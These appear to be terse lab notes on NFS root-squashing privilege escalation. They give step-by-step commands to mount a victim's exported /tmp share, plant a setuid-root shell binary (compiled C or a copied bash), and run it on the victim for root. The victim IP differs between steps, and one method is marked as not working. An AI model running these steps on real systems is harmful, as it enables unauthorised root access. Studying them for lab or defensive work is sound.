NFS Root Squashing

check:

cat /etc/exports

this means that the /tmp folder is shareable and can be mounted so we can mount it!

how?

on Kali:

showmount -e 10.10.231.117

this is the victim machine IP

we can mount /tmp

make directory:

mkdir /tmp/mountme

sudo mount -v -o rw,vers=3 10.10.221.115:/tmp /tmp/mountme

On Victim: (This isn’t working, alternative at the bottom)

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/x.c

gcc x.c -o x

compile:

gcc /tmp/mountme/x.c -o /tmp/mountme/x

add perms:

sudo chown root:root /tmp/mountme/x

sudo chmod +s /tmp/mountme/x

On the ssh tmp folder:

/tmp/x

Alternative (bash, no compile):

on victim:

cp /bin/bash /tmp/bash

on Kali:

sudo mount -v -o rw,vers=3 10.10.221.115:/tmp /tmp/mountme

sudo chown root:root /tmp/mountme/bash

sudo chmod +s /tmp/mountme/bash

On Victim:

/tmp/bash -p